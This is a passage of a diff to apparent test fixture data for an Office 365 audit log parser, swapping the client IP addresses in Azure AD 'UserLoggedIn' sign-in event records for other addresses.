- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"f100d714-ffa2-4077-bf90-2f57a3b366c0\",\"InterSystemsId\":\"b744259e-13e0-43d7-9f56-82cdbd54cf7c\",\"IntraSystemId\":\"ce9f104d-1a1b-488e-9313-b9729e99c400\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:06\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"f100d714-ffa2-4077-bf90-2f57a3b366c0\",\"InterSystemsId\":\"b744259e-13e0-43d7-9f56-82cdbd54cf7c\",\"IntraSystemId\":\"ce9f104d-1a1b-488e-9313-b9729e99c400\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -3989,10 +3989,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "79.159.10.151",
+ "ActorIpAddress": "67.43.156.13",
 "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "79.159.10.151",
+ "ClientIP": "67.43.156.13",
 "CreationTime": "2020-02-12T10:52:06",
 "ExtendedProperties": [
 {
@@ -4042,7 +4042,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:33:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4b0f0d57-0766-4621-8aa0-04b8d8b63a78\",\"InterSystemsId\":\"b7d9a234-9fdd-4e36-9cf3-fd825f22697a\",\"IntraSystemId\":\"49092519-a590-4207-b1b3-1d49f9100a00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"4b0f0d57-0766-4621-8aa0-04b8d8b63a78\",\"InterSystemsId\":\"b7d9a234-9fdd-4e36-9cf3-fd825f22697a\",\"IntraSystemId\":\"49092519-a590-4207-b1b3-1d49f9100a00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -4060,10 +4060,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "37.29.234.179",
+ "ActorIpAddress": "67.43.156.14",
 "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "37.29.234.179",
+ "ClientIP": "67.43.156.14",
 "CreationTime": "2020-02-08T14:33:50",
 "ExtendedProperties": [
 {
@@ -4113,7 +4113,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:38\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8d9a1fa8-7b85-4c5d-9e96-5728d572fb95\",\"InterSystemsId\":\"bb677f9e-953a-4bde-bb91-0ef8209200a1\",\"IntraSystemId\":\"1da3c318-642f-48dc-836b-e83b27655b00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:38\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"8d9a1fa8-7b85-4c5d-9e96-5728d572fb95\",\"InterSystemsId\":\"bb677f9e-953a-4bde-bb91-0ef8209200a1\",\"IntraSystemId\":\"1da3c318-642f-48dc-836b-e83b27655b00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -4131,10 +4131,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-10T15:13:38",
 "ExtendedProperties": [
 {
@@ -4184,7 +4184,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:44:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"9756fe5b-ea0d-42fa-a665-be8e0eb100e5\",\"InterSystemsId\":\"c355f078-53d7-4d60-b836-851a09a98208\",\"IntraSystemId\":\"20e56367-e902-4200-855b-2ef7b99e5f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:44:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"9756fe5b-ea0d-42fa-a665-be8e0eb100e5\",\"InterSystemsId\":\"c355f078-53d7-4d60-b836-851a09a98208\",\"IntraSystemId\":\"20e56367-e902-4200-855b-2ef7b99e5f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -4202,10 +4202,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "213.97.47.133",
+ "ActorIpAddress": "67.43.156.15",
 "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "213.97.47.133",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-07T16:44:05",
 "ExtendedProperties": [
 {
@@ -4255,7 +4255,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:28:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"abbf584f-b3a9-4b6d-9b37-4cc4b802ca4d\",\"InterSystemsId\":\"c5874ff2-7c53-4d51-9252-7abbf0524b1c\",\"IntraSystemId\":\"3188aef9-6b4e-44f2-8455-c28b49552200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:28:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"abbf584f-b3a9-4b6d-9b37-4cc4b802ca4d\",\"InterSystemsId\":\"c5874ff2-7c53-4d51-9252-7abbf0524b1c\",\"IntraSystemId\":\"3188aef9-6b4e-44f2-8455-c28b49552200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -4273,10 +4273,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:28:51",
 "ExtendedProperties": [
 {
@@ -4326,7 +4326,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d137a5e4-7004-493a-acca-5fb167d1f207\",\"InterSystemsId\":\"cf2168a1-6537-4ed6-80a5-797c3458180c\",\"IntraSystemId\":\"23f53edd-63a7-4292-9d80-4fbc49c11e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
+ "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:25:21\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d137a5e4-7004-493a-acca-5fb167d1f207\",\"InterSystemsId\":\"cf2168a1-6537-4ed6-80a5-797c3458180c\",\"IntraSystemId\":\"23f53edd-63a7-4292-9d80-4fbc49c11e00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -4344,10 +4344,10 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:25:21",
 "ExtendedProperties": [
 {
@@ -4397,7 +4397,7 @@
 },
 {
 "event": {
- "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:20\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"73f0a2ef-35be-4a71-9545-59d879fc8fb2\",\"InterSystemsId\":\"d21f6867-0670-4c94-b6fa-bde326fcf3c6\",\"IntraSystemId\":\"1fa4819f-605a-4ebe-a2c3-bc11c3f8e200\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
